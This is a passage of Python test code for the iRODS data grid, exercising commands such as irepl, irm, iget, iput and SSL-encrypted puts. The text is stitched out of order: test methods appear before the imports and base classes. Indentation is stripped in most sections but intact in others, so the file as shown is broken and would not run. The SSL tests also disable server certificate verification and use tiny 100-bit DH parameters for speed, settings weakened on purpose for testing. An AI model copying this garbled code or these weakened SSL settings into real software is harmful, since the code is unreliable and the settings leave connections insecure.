dir = os.path.join(vaultpath, 'home', s.sessions[1].getUserName())
if not os.path.exists(dir):
os.makedirs(dir)
# create file in vault
filename = "newfile.txt"
filepath = os.path.join(dir, filename)
f = open(filepath, 'wb')
f.write("TESTFILE -- [" + filepath + "]")
f.close()
# assertions
assertiCmd(s.adminsession, "ils -L " + filename, "ERROR", "does not exist") # should not be listed
assertiCmd(s.sessions[1], "ireg " + filepath + " /" + s.sessions[1].getZoneName() + "/home/" + s.sessions[
1].getUserName() + "/" + s.sessions[1].sessionId + "/" + filename, "ERROR", "PATH_REG_NOT_ALLOWED") # ireg
assertiCmdFail(s.sessions[1], "ils -L " + filename, "LIST", filename) # should not be listed
# local cleanup
output = commands.getstatusoutput('rm ' + filepath)
###################
# irepl
###################
def test_irepl_invalid_input(self):
# local setup
filename = "somefile.txt"
filepath = create_local_testfile(filename)
# assertions
# should not be listed
assertiCmd(s.adminsession, "ils -L " + filename, "STDERR", "does not exist")
assertiCmd(s.adminsession, "iput " + filename) # put file
# for debugging
assertiCmd(s.adminsession, "ils -L " + filename, "STDOUT", filename)
# replicate to bad resource
assertiCmd(s.adminsession, "irepl -R nonresc " + filename, "STDERR", "SYS_INVALID_INPUT_PARAM")
assertiCmd(s.adminsession, "irm -f " + filename) # cleanup file
# local cleanup
os.remove(filepath)
def test_irepl_multithreaded(self):
# local setup
filename = "largefile.txt"
filepath = create_local_largefile(filename)
# assertions
assertiCmd(s.adminsession, "ils -L " + filename, "STDERR", "does not exist") # should not be listed
assertiCmd(s.adminsession, "iput " + filename) # put file
assertiCmd(s.adminsession, "ils -L " + filename, "STDOUT", filename) # for debugging
assertiCmd(s.adminsession, "irepl -R " + self.testresc + " -N 3 " + filename) # replicate to test resource
# test resource should be listed
assertiCmd(s.adminsession, "ils -l " + filename, "STDOUT", self.testresc)
assertiCmd(s.adminsession, "irm -f " + filename) # cleanup file
# local cleanup
os.remove(filepath)
def test_irepl_update_replicas(self):
# local setup
filename = "updatereplicasfile.txt"
filepath = create_local_testfile(filename)
hostname = get_hostname()
doublefile = "doublefile.txt"
os.system("cat %s %s > %s" % (filename, filename, doublefile))
doublesize = str(os.stat(doublefile).st_size)
# assertions
assertiCmd(s.adminsession, "iadmin mkresc thirdresc unixfilesystem %s:/tmp/thirdrescVault" %
hostname, "LIST", "Creating") # create third resource
assertiCmd(s.adminsession, "iadmin mkresc fourthresc unixfilesystem %s:/tmp/fourthrescVault" %
hostname, "LIST", "Creating") # create fourth resource
assertiCmd(s.adminsession, "ils -L " + filename, "ERROR", "does not exist") # should not be listed
assertiCmd(s.adminsession, "iput " + filename) # put file
# replicate to test resource
assertiCmd(s.adminsession, "irepl -R " + self.testresc + " " + filename)
# replicate to third resource
assertiCmd(s.adminsession, "irepl -R thirdresc " + filename)
# replicate to fourth resource
assertiCmd(s.adminsession, "irepl -R fourthresc " + filename)
# repave overtop test resource
assertiCmd(s.adminsession, "iput -f -R " + self.testresc + " " + doublefile + " " + filename)
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", filename) # for debugging
# should have a dirty copy
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 0 ", " & " + filename])
# should have a clean copy
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 1 ", " & " + filename])
# should have a dirty copy
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 2 ", " & " + filename])
# should have a dirty copy
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 3 ", " & " + filename])
assertiCmd(s.adminsession, "irepl -U " + filename) # update last replica
# should have a dirty copy
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 0 ", " & " + filename])
# should have a clean copy
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 1 ", " & " + filename])
# should have a dirty copy
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 2 ", " & " + filename])
# should have a clean copy
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 3 ", " & " + filename])
assertiCmd(s.adminsession, "irepl -aU " + filename) # update all replicas
# should have a clean copy
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 0 ", " & " + filename])
# should have a clean copy
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 1 ", " & " + filename])
# should have a clean copy
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 2 ", " & " + filename])
# should have a clean copy
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 3 ", " & " + filename])
assertiCmd(s.adminsession, "irm -f " + filename) # cleanup file
assertiCmd(s.adminsession, "iadmin rmresc thirdresc") # remove third resource
assertiCmd(s.adminsession, "iadmin rmresc fourthresc") # remove third resource
# local cleanup
os.remove(filepath)
os.remove(doublefile)
def test_irepl_over_existing_second_replica__ticket_1705(self):
# local setup
filename = "secondreplicatest.txt"
filepath = create_local_testfile(filename)
# assertions
assertiCmd(s.adminsession, "ils -L " + filename, "ERROR", "does not exist") # should not be listed
assertiCmd(s.adminsession, "iput -R " + self.testresc + " " + filename) # put file
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", filename) # for debugging
assertiCmd(s.adminsession, "irepl " + filename) # replicate to default resource
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", filename) # for debugging
assertiCmd(s.adminsession, "irepl " + filename) # replicate overtop default resource
# should not have a replica 2
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 2 ", " & " + filename])
assertiCmd(s.adminsession, "irepl -R " + self.testresc + " " + filename) # replicate overtop test resource
# should not have a replica 2
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 2 ", " & " + filename])
# local cleanup
os.remove(filepath)
def test_irepl_over_existing_third_replica__ticket_1705(self):
# local setup
filename = "thirdreplicatest.txt"
filepath = create_local_testfile(filename)
hostname = get_hostname()
# assertions
assertiCmd(s.adminsession, "iadmin mkresc thirdresc unixfilesystem %s:/tmp/thirdrescVault" %
hostname, "LIST", "Creating") # create third resource
assertiCmd(s.adminsession, "ils -L " + filename, "ERROR", "does not exist") # should not be listed
assertiCmd(s.adminsession, "iput " + filename) # put file
assertiCmd(s.adminsession, "irepl -R " + self.testresc + " " + filename) # replicate to test resource
assertiCmd(s.adminsession, "irepl -R thirdresc " + filename) # replicate to third resource
assertiCmd(s.adminsession, "irepl " + filename) # replicate overtop default resource
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", filename) # for debugging
assertiCmd(s.adminsession, "irepl -R " + self.testresc + " " + filename) # replicate overtop test resource
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", filename) # for debugging
assertiCmd(s.adminsession, "irepl -R thirdresc " + filename) # replicate overtop third resource
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", filename) # for debugging
# should not have a replica 3
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 3 ", " & " + filename])
# should not have a replica 4
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 4 ", " & " + filename])
assertiCmd(s.adminsession, "irm -f " + filename) # cleanup file
assertiCmd(s.adminsession, "iadmin rmresc thirdresc") # remove third resource
# local cleanup
os.remove(filepath)
def test_irepl_over_existing_bad_replica__ticket_1705(self):
# local setup
filename = "reploverwritebad.txt"
filepath = create_local_testfile(filename)
doublefile = "doublefile.txt"
os.system("cat %s %s > %s" % (filename, filename, doublefile))
doublesize = str(os.stat(doublefile).st_size)
# assertions
assertiCmd(s.adminsession, "ils -L " + filename, "ERROR", "does not exist") # should not be listed
assertiCmd(s.adminsession, "iput " + filename) # put file
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", filename) # for debugging
assertiCmd(s.adminsession, "irepl -R " + self.testresc + " " + filename) # replicate to test resource
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", filename) # for debugging
# overwrite default repl with different data
assertiCmd(s.adminsession, "iput -f %s %s" % (doublefile, filename))
# default resource should have clean copy
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 0 ", " & " + filename])
# default resource should have new double clean copy
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 0 ", " " + doublesize + " ", " & " + filename])
# test resource should not have doublesize file
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST",
[" 1 " + self.testresc, " " + doublesize + " ", " " + filename])
# replicate back onto test resource
assertiCmd(s.adminsession, "irepl -R " + self.testresc + " " + filename)
# test resource should have new clean doublesize file
assertiCmd(s.adminsession, "ils -L " + filename, "LIST",
[" 1 " + self.testresc, " " + doublesize + " ", " & " + filename])
# should not have a replica 2
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 2 ", " & " + filename])
# local cleanup
os.remove(filepath)
os.remove(doublefile)
# repl update ( repave old copies )
# walk through command line switches
def test_irepl_with_purgec(self):
# local setup
filename = "purgecreplfile.txt"
filepath = os.path.abspath(filename)
f = open(filepath, 'wb')
f.write("TESTFILE -- [" + filepath + "]")
f.close()
# assertions
assertiCmd(s.adminsession, "ils -L " + filename, "ERROR", "does not exist") # should not be listed
assertiCmd(s.adminsession, "iput " + filename) # put file
assertiCmd(s.adminsession, "irepl -R " + self.testresc + " --purgec " + filename) # replicate to test resource
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 0 ", filename]) # should be trimmed
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 1 ", filename]) # should be listed once
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 2 ", filename]) # should be listed only once
# local cleanup
output = commands.getstatusoutput('rm ' + filepath)
def test_irepl_with_admin_mode(self):
pydevtest_common.touch( "file.txt" )
for i in range(0, 100):
assertiCmd(s.sessions[1], "iput file.txt " + str(i) + ".txt", "EMPTY")
homepath = "/" + s.adminsession.getZoneName() + "/home/" + s.sessions[1].getUserName()
assertiCmd(s.adminsession, "irepl -r -M -R " + self.testresc + " " + homepath, "EMPTY" ) # creates replica
###################
# irm
###################
def test_irm_doesnotexist(self):
assertiCmdFail(s.adminsession, "irm doesnotexist") # does not exist
def test_irm(self):
assertiCmd(s.adminsession, "ils -L " + self.testfile, "LIST", self.testfile) # should be listed
assertiCmd(s.adminsession, "irm " + self.testfile) # remove from grid
assertiCmdFail(s.adminsession, "ils -L " + self.testfile, "LIST", self.testfile) # should be deleted
trashpath = "/" + s.adminsession.getZoneName() + "/trash/home/" + s.adminsession.getUserName() + \
"/" + s.adminsession.sessionId
# should be in trash
assertiCmd(s.adminsession, "ils -L " + trashpath + "/" + self.testfile, "LIST", self.testfile)
def test_irm_force(self):
assertiCmd(s.adminsession, "ils -L " + self.testfile, "LIST", self.testfile) # should be listed
assertiCmd(s.adminsession, "irm -f " + self.testfile) # remove from grid
assertiCmdFail(s.adminsession, "ils -L " + self.testfile, "LIST", self.testfile) # should be deleted
trashpath = "/" + s.adminsession.getZoneName() + "/trash/home/" + s.adminsession.getUserName() + \
"/" + s.adminsession.sessionId
# should not be in trash
assertiCmdFail(s.adminsession, "ils -L " + trashpath + "/" + self.testfile, "LIST", self.testfile)
def test_irm_specific_replica(self):
assertiCmd(s.adminsession, "ils -L " + self.testfile, "LIST", self.testfile) # should be listed
assertiCmd(s.adminsession, "irepl -R " + self.testresc + " " + self.testfile) # creates replica
assertiCmd(s.adminsession, "ils -L " + self.testfile, "LIST", self.testfile) # should be listed twice
assertiCmd(s.adminsession, "irm -n 0 " + self.testfile) # remove original from grid
# replica 1 should be there
assertiCmd(s.adminsession, "ils -L " + self.testfile, "LIST", ["1 " + self.testresc, self.testfile])
assertiCmdFail(s.adminsession, "ils -L " + self.testfile, "LIST",
["0 " + s.adminsession.getDefResource(), self.testfile]) # replica 0 should be gone
trashpath = "/" + s.adminsession.getZoneName() + "/trash/home/" + s.adminsession.getUserName() + \
"/" + s.adminsession.sessionId
assertiCmdFail(s.adminsession, "ils -L " + trashpath + "/" + self.testfile, "LIST",
["0 " + s.adminsession.getDefResource(), self.testfile]) # replica should not be in trash
def test_irm_recursive_file(self):
assertiCmd(s.adminsession, "ils -L " + self.testfile, "LIST", self.testfile) # should be listed
assertiCmd(s.adminsession, "irm -r " + self.testfile) # should not fail, even though a collection
def test_irm_recursive(self):
assertiCmd(s.adminsession, "icp -r " + self.testdir + " copydir") # make a dir copy
assertiCmd(s.adminsession, "ils -L ", "LIST", "copydir") # should be listed
assertiCmd(s.adminsession, "irm -r copydir") # should remove
assertiCmdFail(s.adminsession, "ils -L ", "LIST", "copydir") # should not be listed
@unittest.skipIf(RUN_IN_TOPOLOGY == True, "Skip for Topology Testing")
def test_irm_with_read_permission(self):
assertiCmd(s.sessions[1], "icd ../../public") # switch to shared area
assertiCmd(s.sessions[1], "ils -AL " + self.testfile, "LIST", self.testfile) # should be listed
assertiCmdFail(s.sessions[1], "irm " + self.testfile) # read perm should not be allowed to remove
assertiCmd(s.sessions[1], "ils -AL " + self.testfile, "LIST", self.testfile) # should still be listed
@unittest.skipIf(RUN_IN_TOPOLOGY == True, "Skip for Topology Testing")
def test_irm_with_write_permission(self):
assertiCmd(s.sessions[2], "icd ../../public") # switch to shared area
assertiCmd(s.sessions[2], "ils -AL " + self.testfile, "LIST", self.testfile) # should be listed
assertiCmdFail(s.sessions[2], "irm " + self.testfile) # write perm should not be allowed to remove
assertiCmd(s.sessions[2], "ils -AL " + self.testfile, "LIST", self.testfile) # should still be listed
###################
# irmtrash
###################
def test_irmtrash_admin(self):
# assertions
assertiCmd(s.adminsession, "irm " + self.testfile) # remove from grid
assertiCmd(s.adminsession, "ils -rL /" + s.adminsession.getZoneName() + "/trash/home/" +
s.adminsession.getUserName() + "/", "LIST", self.testfile) # should be listed
assertiCmd(s.adminsession, "irmtrash") # should be listed
assertiCmdFail(s.adminsession, "ils -rL /" + s.adminsession.getZoneName() + "/trash/home/" +
s.adminsession.getUserName() + "/", "LIST", self.testfile) # should be deleted
    # [#858] test some admin_mode commands
import sys
if (sys.version_info >= (2, 7)):
import unittest
else:
import unittest2 as unittest
import pydevtest_common
from pydevtest_common import assertiCmd, assertiCmdFail, interruptiCmd, create_local_testfile, create_local_largefile, get_hostname, RUN_IN_TOPOLOGY, get_irods_top_level_dir, get_irods_config_dir, mod_json_file
import pydevtest_sessions as s
import commands
import os
import shlex
import datetime
import time
import psutil
import base64
import hashlib
class ResourceBase(object):
    """Shared setup/teardown for resource test suites.

    Creates the resource under test plus two helper resources, a small
    test file/dir layout in the grid, and public-copy permissions; tears
    all of it down again afterwards.
    """

    def __init__(self):
        print("in ResourceBase.__init__")
        # fixture names shared by all resource tests
        self.testfile = "pydevtest_testfile.txt"
        self.testdir = "pydevtest_testdir"
        self.testresc = "pydevtest_TestResc"
        self.anotherresc = "pydevtest_AnotherResc"

    def run_resource_setup(self):
        """Create the resource under test, helper resources, files, and permissions."""
        print("run_resource_setup - BEGIN")
        # set up resource itself
        for i in self.my_test_resource["setup"]:
            parameters = shlex.split(i)  # preserves quoted substrings
            if parameters[0] == "iadmin":
                print(s.adminsession.runAdminCmd(parameters[0], parameters[1:]))
            else:
                output = commands.getstatusoutput(" ".join(parameters))
                print(output)
        # set up test resource
        print("run_resource_setup - creating test resources")
        output = commands.getstatusoutput("hostname")
        hostname = output[1]
        s.adminsession.runAdminCmd(
            'iadmin', ["mkresc", self.testresc, "unix file system", hostname + ":/tmp/pydevtest_" + self.testresc])
        s.adminsession.runAdminCmd(
            'iadmin', ["mkresc", self.anotherresc, "unix file system", hostname + ":/tmp/pydevtest_" + self.anotherresc])
        # set up test files
        print("run_resource_setup - generating local testfile")
        # context manager guarantees the handle is closed even if the write fails
        with open(self.testfile, 'wb') as f:
            f.write("I AM A TESTFILE -- [" + self.testfile + "]")
        print("run_resource_setup - adding testfile to grid")
        s.adminsession.runCmd('imkdir', [self.testdir])
        s.adminsession.runCmd('iput', [self.testfile])
        print("run_resource_setup - adding testfile to grid public directory")
        s.adminsession.runCmd('icp', [self.testfile, "../../public/"])  # copy of testfile into public
        print("run_resource_setup - setting permissions")
        # permissions
        s.adminsession.runCmd(
            'ichmod', ["read", s.users[1]['name'], "../../public/" + self.testfile])  # read for user1
        s.adminsession.runCmd(
            'ichmod', ["write", s.users[2]['name'], "../../public/" + self.testfile])  # write for user2
        # set test group
        self.testgroup = s.testgroup
        print("run_resource_setup - END")

    def run_resource_teardown(self):
        """Remove test files, trash, and resources created by run_resource_setup."""
        print("run_resource_teardown - BEGIN")
        # local file cleanup
        print("run_resource_teardown - removing local testfile")
        os.unlink(self.testfile)
        # remove grid test files
        print("run_resource_teardown - removing testfile from grid public directory")
        s.adminsession.runCmd('icd')
        s.adminsession.runCmd('irm', [self.testfile, "../public/" + self.testfile])
        # remove any bundle files
        print("run_resource_teardown - removing any bundle files")
        # pass command name and argument list separately, consistent with every
        # other runCmd call site (was: runCmd('irm -rf ../../bundle'))
        s.adminsession.runCmd('irm', ['-rf', '../../bundle'])
        # tear down admin session files
        print("run_resource_teardown - admin session removing session files")
        s.adminsession.runCmd('irm', ['-r', s.adminsession.sessionId])
        # clean trash
        print("run_resource_teardown - clean trash")
        s.adminsession.runCmd('irmtrash', ['-M'])
        # remove resc
        print("run_resource_teardown - removing test resources")
        s.adminsession.runAdminCmd('iadmin', ['rmresc', self.testresc])
        s.adminsession.runAdminCmd('iadmin', ['rmresc', self.anotherresc])
        # tear down resource itself
        print("run_resource_teardown - tearing down actual resource")
        for i in self.my_test_resource["teardown"]:
            parameters = shlex.split(i)  # preserves quoted substrings
            if parameters[0] == "iadmin":
                print(s.adminsession.runAdminCmd(parameters[0], parameters[1:]))
            else:
                output = commands.getstatusoutput(" ".join(parameters))
                print(output)
        print("run_resource_teardown - END")
class ShortAndSuite(ResourceBase):
    """Minimal suite used to exercise the test framework itself."""

    def __init__(self):
        print("in ShortAndSuite.__init__")
        ResourceBase.__init__(self)

    def test_awesome(self):
        """Trivial smoke test."""
        print("AWESOME!")

    def test_local_iget(self):
        """iget the shared testfile into a local file and verify it landed."""
        print(self.testfile)
        # local setup
        localfile = "local.txt"
        # fetch the data object from the grid
        assertiCmd(s.adminsession, "iget " + self.testfile + " " + localfile)  # iget
        listing = commands.getstatusoutput('ls ' + localfile)
        print(" output: [" + listing[1] + "]")
        assert listing[1] == localfile
        # local cleanup
        output = commands.getstatusoutput('rm ' + localfile)
class ResourceSuite(ResourceBase):
'''Define the tests to be run for a resource type.
This class is designed to be used as a base class by developers
when they write tests for their own resource plugins.
All these tests will be inherited and the developer can add
any new tests for new functionality or replace any tests
they need to modify.
'''
def __init__(self):
print "in ResourceSuite.__init__"
ResourceBase.__init__(self)
###################
# iget
###################
def test_local_iget(self):
# local setup
localfile = "local.txt"
# assertions
assertiCmd(s.adminsession, "iget " + self.testfile + " " + localfile) # iget
output = commands.getstatusoutput('ls ' + localfile)
print " output: [" + output[1] + "]"
assert output[1] == localfile
# local cleanup
output = commands.getstatusoutput('rm ' + localfile)
def test_local_iget_with_overwrite(self):
# local setup
localfile = "local.txt"
# assertions
assertiCmd(s.adminsession, "iget " + self.testfile + " " + localfile) # iget
assertiCmdFail(s.adminsession, "iget " + self.testfile + " " + localfile) # already exists
assertiCmd(s.adminsession, "iget -f " + self.testfile + " " + localfile) # already exists, so force
output = commands.getstatusoutput('ls ' + localfile)
print " output: [" + output[1] + "]"
assert output[1] == localfile
# local cleanup
output = commands.getstatusoutput('rm ' + localfile)
def test_local_iget_with_bad_option(self):
# assertions
assertiCmdFail(s.adminsession, "iget -z") # run iget with bad option
def test_iget_with_purgec(self):
# local setup
filename = "purgecgetfile.txt"
filepath = os.path.abspath(filename)
f = open(filepath, 'wb')
f.write("TESTFILE -- [" + filepath + "]")
f.close()
# assertions
assertiCmd(s.adminsession, "ils -L " + filename, "ERROR", "does not exist") # should not be listed
assertiCmd(s.adminsession, "iput " + filename) # put file
assertiCmd(s.adminsession, "iget -f --purgec " + filename) # get file
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 0 ", filename]) # should be listed once
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 1 ", filename]) # should be listed only once
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 2 ", filename]) # should be listed only once
# local cleanup
output = commands.getstatusoutput('rm ' + filepath)
###################
# imv
###################
def test_local_imv(self):
# local setup
movedfile = "moved_file.txt"
# assertions
assertiCmd(s.adminsession, "imv " + self.testfile + " " + movedfile) # move
assertiCmd(s.adminsession, "ils -L " + movedfile, "LIST", movedfile) # should be listed
# local cleanup
def test_local_imv_to_directory(self):
# local setup
# assertions
assertiCmd(s.adminsession, "imv " + self.testfile + " " + self.testdir) # move
assertiCmd(s.adminsession, "ils -L " + self.testdir, "LIST", self.testfile) # should be listed
# local cleanup
def test_local_imv_to_existing_filename(self):
# local setup
copyfile = "anotherfile.txt"
# assertions
assertiCmd(s.adminsession, "icp " + self.testfile + " " + copyfile) # icp
# cannot overwrite existing file
assertiCmd(s.adminsession, "imv " + self.testfile + " " + copyfile, "ERROR", "CAT_NAME_EXISTS_AS_DATAOBJ")
# local cleanup
###################
# iphymv
###################
def test_iphymv_to_nonexistent_resource(self):
assertiCmd(s.adminsession, "ils -L", "STDOUT", self.testfile) # debug
assertiCmd(s.adminsession, "iphymv -R nonexistentresc " + self.testfile,
"STDERR", "SYS_RESC_DOES_NOT_EXIST") # should fail
assertiCmd(s.adminsession, "ils -L", "STDOUT", self.testfile) # debug
def test_iphymv_admin_mode(self):
pydevtest_common.touch( "file.txt" )
for i in range(0, 100):
assertiCmd(s.sessions[1], "iput file.txt " + str(i) + ".txt", "EMPTY")
homepath = "/" + s.adminsession.getZoneName() + "/home/" + s.sessions[1].getUserName() + "/" + s.sessions[1].sessionId
assertiCmd(s.adminsession, "iphymv -r -M -R " + self.testresc + " " + homepath, "EMPTY" ) # creates replica
###################
# iput
###################
    def test_ssl_iput_with_rods_env(self):
        """Encrypted iput with SSL configured through irods_environment.json.

        Generates a throwaway self-signed server certificate and DH parameters,
        points the client environment at them with CS_NEG_REQUIRE, restarts the
        server so it reads the new settings, then puts and lists a small file.
        NOTE(review): restarts the shared iRODS server and rewrites the admin
        session's environment file — not safe to run concurrently with other
        tests; verify isolation in the harness.
        """
        # set up client and server side for ssl handshake
        # server side certificate setup
        os.system("openssl genrsa -out server.key 2> /dev/null")
        os.system("openssl req -batch -new -key server.key -out server.csr")
        os.system("openssl req -batch -new -x509 -key server.key -out server.crt -days 365")
        os.system("mv server.crt chain.pem")
        # normally 2048, but smaller size here for speed
        os.system("openssl dhparam -2 -out dhparams.pem 100 2> /dev/null")
        # add client irodsEnv settings
        clientEnvFile = s.adminsession.sessionDir + "/irods_environment.json"
        # back up the original environment file so it can be restored below
        os.system("cp %s %sOrig" % (clientEnvFile, clientEnvFile))
        env = {}
        env['irods_client_server_policy'] = 'CS_NEG_REQUIRE'
        env['irods_ssl_certificate_chain_file'] = get_irods_top_level_dir() + "/tests/pydevtest/chain.pem"
        env['irods_ssl_certificate_key_file'] = get_irods_top_level_dir() + "/tests/pydevtest/server.key"
        env['irods_ssl_dh_params_file'] = get_irods_top_level_dir() + "/tests/pydevtest/dhparams.pem"
        env['irods_ssl_verify_server'] = "none"
        mod_json_file(clientEnvFile, env)
        # server needs the environment variable to
        # read the correctly changed environment
        # server reboot to pick up new irodsEnv settings
        env_val = s.adminsession.sessionDir + "/irods_environment.json"
        sys_cmd = "export IRODS_ENVIRONMENT_FILE=" + env_val + ";" + \
            get_irods_top_level_dir() + "/iRODS/irodsctl restart"
        os.system(sys_cmd)
        # do the encrypted put
        filename = "encryptedfile.txt"
        filepath = create_local_testfile(filename)
        assertiCmd(s.adminsession, "iinit rods")  # reinitialize
        # small file
        assertiCmd(s.adminsession, "iput " + filename)  # encrypted put - small file
        assertiCmd(s.adminsession, "ils -L " + filename, "LIST", filename)  # should be listed
        # reset client environment to not require SSL
        os.system("mv %sOrig %s" % (clientEnvFile, clientEnvFile))
        # clean up
        os.system("rm server.key server.csr chain.pem dhparams.pem")
        os.remove(filename)
    def test_ssl_iput_small_and_large_files(self):
        """Encrypted iput of both a small file and a 60MB file over SSL.

        Unlike test_ssl_iput_with_rods_env, the server-side SSL settings are
        passed via legacy irodsSSL* environment variables rather than the JSON
        environment file; the large put exercises the parallel-transfer path.
        NOTE(review): restarts the shared iRODS server and mutates os.environ —
        not safe to run concurrently with other tests.
        """
        # set up client and server side for ssl handshake
        # server side certificate setup
        os.system("openssl genrsa -out server.key 2> /dev/null")
        os.system("openssl req -batch -new -key server.key -out server.csr")
        os.system("openssl req -batch -new -x509 -key server.key -out server.crt -days 365")
        os.system("mv server.crt chain.pem")
        # normally 2048, but smaller size here for speed
        os.system("openssl dhparam -2 -out dhparams.pem 100 2> /dev/null")
        # server side environment variables
        os.environ['irodsSSLCertificateChainFile'] = get_irods_top_level_dir() + "/tests/pydevtest/chain.pem"
        os.environ['irodsSSLCertificateKeyFile'] = get_irods_top_level_dir() + "/tests/pydevtest/server.key"
        os.environ['irodsSSLDHParamsFile'] = get_irods_top_level_dir() + "/tests/pydevtest/dhparams.pem"
        # client side environment variables
        os.environ['irodsSSLVerifyServer'] = "none"
        # add client irodsEnv settings
        clientEnvFile = s.adminsession.sessionDir + "/irods_environment.json"
        # back up the original environment file so it can be restored below
        os.system("cp %s %sOrig" % (clientEnvFile, clientEnvFile))
        env = {}
        env['irods_client_server_policy'] = 'CS_NEG_REQUIRE'
        mod_json_file(clientEnvFile, env)
        # server reboot to pick up new irodsEnv settings
        os.system(get_irods_top_level_dir() + "/iRODS/irodsctl restart")
        # do the encrypted put
        filename = "encryptedfile.txt"
        filepath = create_local_testfile(filename)
        assertiCmd(s.adminsession, "iinit rods")  # reinitialize
        # small file
        assertiCmd(s.adminsession, "iput " + filename)  # encrypted put - small file
        assertiCmd(s.adminsession, "ils -L " + filename, "LIST", filename)  # should be listed
        # large file (60MB, forces the multi-threaded transfer path)
        largefilename = "BIGencryptedfile.txt"
        output = commands.getstatusoutput('dd if=/dev/zero of=' + largefilename + ' bs=1M count=60')
        assert output[0] == 0, "dd did not successfully exit"
        #os.system("ls -al "+largefilename)
        assertiCmd(s.adminsession, "iput " + largefilename)  # encrypted put - large file
        assertiCmd(s.adminsession, "ils -L " + largefilename, "LIST", largefilename)  # should be listed
        # reset client environment to not require SSL
        os.system("mv %sOrig %s" % (clientEnvFile, clientEnvFile))
        # clean up
        os.system("rm server.key server.csr chain.pem dhparams.pem")
        os.remove(filename)
        os.remove(largefilename)
@unittest.skipIf(psutil.disk_usage('/').free < 20000000000, "not enough free space for 5 x 2.3GB file ( local + iput + 3 repl children )")
def test_local_iput_with_really_big_file__ticket_1623(self):
# regression test against ticket [#1623]
# bigfilesize = [2287636992] is just under 'int' threshold
# bigfilesize = [2297714688] is just big enough to trip 'int' size error buffers
# local setup
big = "reallybigfile.txt"
bigger = "tmp.txt"
f = open(big, 'wb')
f.write("skjfhrq274fkjhvifqp92348fuho3uigho4iulqf2h3foq3i47fuhqof9q834fyhoq3iufhq34f8923fhoq348fhurferfwheere")
f.write("skjfhrq274fkjhvifqp92348fuho3uigho4iulqf2h3foq3i47fuhqof9q834fyhoq3iufhq34f8923fhoq348fhurferfwheere")
f.write("skjfhrq274fkjhvg34eere----2")
f.close()
for i in range(9):
commands.getstatusoutput(
"cat " + big + " " + big + " " + big + " " + big + " " + big + " " + big + " > " + bigger)
os.rename(bigger, big)
datafilename = big
# assertions
print "bigfilesize = [" + str(os.stat(datafilename).st_size) + "]"
# should not be listed
assertiCmd(s.adminsession, "ils -L " + datafilename, "ERROR", [datafilename, "does not exist"])
assertiCmd(s.adminsession, "iput " + datafilename) # iput
assertiCmd(s.adminsession, "ils -L " + datafilename, "LIST", datafilename) # should be listed
# local cleanup
output = commands.getstatusoutput('rm ' + datafilename)
def test_local_iput(self):
'''also needs to count and confirm number of replicas after the put'''
# local setup
datafilename = "newfile.txt"
f = open(datafilename, 'wb')
f.write("TESTFILE -- [" + datafilename + "]")
f.close()
# assertions
assertiCmdFail(s.adminsession, "ils -L " + datafilename, "LIST", datafilename) # should not be listed
assertiCmd(s.adminsession, "iput " + datafilename) # iput
assertiCmd(s.adminsession, "ils -L " + datafilename, "LIST", datafilename) # should be listed
# local cleanup
output = commands.getstatusoutput('rm ' + datafilename)
def test_local_iput_overwrite(self):
assertiCmdFail(s.adminsession, "iput " + self.testfile) # fail, already exists
assertiCmd(s.adminsession, "iput -f " + self.testfile) # iput again, force
    def test_local_iput_recursive(self):
        # TODO(review): stub — only names a directory and performs no iput or
        # assertions, so recursive iput is effectively untested here.
        recursivedirname = "dir"
def test_local_iput_lower_checksum(self):
# local setup
datafilename = "newfile.txt"
with open(datafilename, 'wb') as f:
f.write("TESTFILE -- [" + datafilename + "]")
# assertions
assertiCmd(s.adminsession, "iput -k " + datafilename) # iput
with open(datafilename) as f:
checksum = hashlib.sha256(f.read()).digest().encode("base64").strip()
assertiCmd(s.adminsession, "ils -L", "LIST", "sha2:" + checksum) # check proper checksum
# local cleanup
output = commands.getstatusoutput('rm ' + datafilename)
def test_local_iput_upper_checksum(self):
# local setup
datafilename = "newfile.txt"
with open(datafilename, 'wb') as f:
f.write("TESTFILE -- [" + datafilename + "]")
# assertions
assertiCmd(s.adminsession, "iput -K " + datafilename) # iput
with open(datafilename) as f:
checksum = hashlib.sha256(f.read()).digest().encode("base64").strip()
assertiCmd(s.adminsession, "ils -L", "LIST", "sha2:" + checksum) # check proper checksum
# local cleanup
output = commands.getstatusoutput('rm ' + datafilename)
def test_local_iput_onto_specific_resource(self):
# local setup
datafilename = "anotherfile.txt"
f = open(datafilename, 'wb')
f.write("TESTFILE -- [" + datafilename + "]")
f.close()
# assertions
assertiCmdFail(s.adminsession, "ils -L " + datafilename, "LIST", datafilename) # should not be listed
assertiCmd(s.adminsession, "iput -R " + self.testresc + " " + datafilename) # iput
